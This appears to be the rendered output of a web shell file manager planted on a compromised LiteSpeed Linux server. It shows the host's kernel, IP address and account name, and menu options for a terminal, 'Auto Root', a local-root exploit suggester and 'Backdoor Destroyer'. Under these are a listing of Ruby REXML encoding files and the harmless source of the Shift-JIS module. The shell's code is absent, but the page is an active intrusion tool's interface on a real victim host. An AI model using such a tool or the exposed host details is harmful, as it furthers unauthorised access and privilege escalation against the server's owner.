Linux velvet.gennetworks.in 4.18.0-553.83.1.lve.el8.x86_64 #1 SMP Wed Nov 12 10:04:12 UTC 2025 x86_64
LiteSpeed
Server IP : 161.129.70.235 & Your IP : 216.73.216.5
Domains :
Cant Read [ /etc/named.conf ]
User : virtueex
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby18 /
lib64 /
ruby /
1.8 /
rexml /
encodings /
Delete
Unzip
Name
Size
Permission
Date
Action
CP-1252.rb
4.04
KB
-rw-r--r--
2008-04-18 12:52
EUC-JP.rb
595
B
-rw-r--r--
2007-02-13 04:31
ICONV.rb
433
B
-rw-r--r--
2007-02-13 04:31
ISO-8859-1.rb
134
B
-rw-r--r--
2007-02-13 04:31
ISO-8859-15.rb
2.25
KB
-rw-r--r--
2008-04-18 12:52
SHIFT-JIS.rb
647
B
-rw-r--r--
2007-11-07 00:07
SHIFT_JIS.rb
36
B
-rw-r--r--
2007-02-13 04:31
UNILE.rb
746
B
-rw-r--r--
2007-02-13 04:31
US-ASCII.rb
654
B
-rw-r--r--
2007-02-13 04:31
UTF-16.rb
793
B
-rw-r--r--
2008-04-18 12:52
UTF-8.rb
268
B
-rw-r--r--
2007-02-13 04:31
Save
Rename
module REXML module Encoding begin require 'uconv' def decode_sjis content Uconv::sjistou8(content) end def encode_sjis(str) Uconv::u8tosjis(str) end rescue LoadError require 'nkf' SJISTOU8 = '-Swm0x' U8TOSJIS = '-Wsm0x' def decode_sjis(str) NKF.nkf(SJISTOU8, str) end def encode_sjis content NKF.nkf(U8TOSJIS, content) end end b = proc do |obj| class << obj alias decode decode_sjis alias encode encode_sjis end end register("SHIFT-JIS", &b) register("SHIFT_JIS", &b) end end